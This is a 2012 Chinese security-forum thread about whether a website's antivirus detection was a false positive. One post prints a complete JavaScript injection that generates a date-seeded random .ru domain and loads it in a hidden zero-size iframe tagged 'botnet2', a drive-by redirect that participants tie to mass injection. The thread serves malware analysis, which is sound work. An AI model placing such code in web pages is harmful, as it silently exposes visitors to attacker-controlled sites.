收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://www.thhardwaremag.com/【孤独寂寞恨 by Castle ...
返回列表 发新帖
查看: 879|回复: 9
收起左侧

[已鉴定] http://www.thhardwaremag.com/【孤独寂寞恨 by Castle Mango】

[复制链接]
firefox3
发表于 2012-12-29 17:34:25 | 显示全部楼层 |阅读模式
本帖最后由 wjhstu-VxG 于 2012-12-29 18:13 编辑

22.PNG

评分

参与人数 1经验 +100 收起 理由
wjhstu-VxG + 100 感谢支持,欢迎常来: )

查看全部评分

回复

举报

wjhstu-VxG
发表于 2012-12-29 18:08:45 | 显示全部楼层
赤裸裸的误报,连诺顿都爆了,害的我确认了好久
回复

举报

firefox3
 楼主| 发表于 2012-12-29 18:09:39 | 显示全部楼层
wjhstu-VxG 发表于 2012-12-29 18:08
赤裸裸的误报,连诺顿都爆了,害的我确认了好久

哈哈哈  厉害厉害
回复

举报

wjhstu-VxG
发表于 2012-12-29 18:10:39 | 显示全部楼层
firefox3 发表于 2012-12-29 18:09
哈哈哈  厉害厉害

还是没那些前辈厉害啊,但是基本都走了……好孤独
回复

举报

firefox3
 楼主| 发表于 2012-12-29 18:16:46 | 显示全部楼层
wjhstu-VxG 发表于 2012-12-29 18:10
还是没那些前辈厉害啊,但是基本都走了……好孤独

function nextRandomNumber() {
    var hi = this.seed / this.Q;
    var lo = this.seed % this.Q;
    var test = this.A * lo - this.R * hi;
    if (test > 0) {
        this.seed = test;
    } else {
        this.seed = test + this.M;
    }
    return (this.seed * this.oneOverM);
}

function RandomNumberGenerator(unix) {
    var d = new Date(unix * 1000);
    var s = d.getHours() > 12 ? 1 : 0;
    this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;
    this.R = this.M % this.A;
    this.oneOverM = 1.0 / this.M;
    this.next = nextRandomNumber;
    return this;
}

function createRandomNumber(r, Min, Max) {
    return Math.round((Max - Min) * r.next() + Min);
}

function generatePseudoRandomString(unix, length, zone) {
    var rand = new RandomNumberGenerator(unix);
    var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
    var str = '';
    for (var i = 0; i < length; i++) {
        str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    }
    return str + '.' + zone;
}

setTimeout(function() {
    try {
        if (typeof iframeWasCreated == "undefined") {
            iframeWasCreated = true;
            var unix = Math.round(+new Date() / 1000);
            var domainName = generatePseudoRandomString(unix, 16, 'ru');
            ifrm = document.createElement("IFRAME");
            ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet2");
            ifrm.style.width = "0px";
            ifrm.style.height = "0px";
            ifrm.style.visibility = "hidden";
            document.body.appendChild(ifrm);
        }
    } catch (e) {}
}, 500);
回复

举报

wjhstu-VxG
发表于 2012-12-29 18:19:41 | 显示全部楼层
firefox3 发表于 2012-12-29 18:16
function nextRandomNumber() {
    var hi = this.seed / this.Q;
    var lo = this.seed % this.Q;
...

怎么了?
回复

举报

firefox3
 楼主| 发表于 2012-12-29 18:21:41 | 显示全部楼层
wjhstu-VxG 发表于 2012-12-29 18:19
怎么了?

没怎么我刷屏呢 哈
回复

举报

wjhstu-VxG
发表于 2012-12-29 18:23:18 | 显示全部楼层
firefox3 发表于 2012-12-29 18:21
没怎么我刷屏呢 哈


这个,是上面某个脚本吗?

这个脚本最后面,可能能解释一些随机数挂马地址产生的原因;如果是这样的话,到需要重新鉴定
回复

举报

GreenCodes
发表于 2012-12-30 15:30:39 | 显示全部楼层
SEP报的是mass injection应该是混合式攻击
回复

举报

流星街
发表于 2012-12-30 17:56:24 | 显示全部楼层
avast攔截~
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-2 13:04 , Processed in 0.122501 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表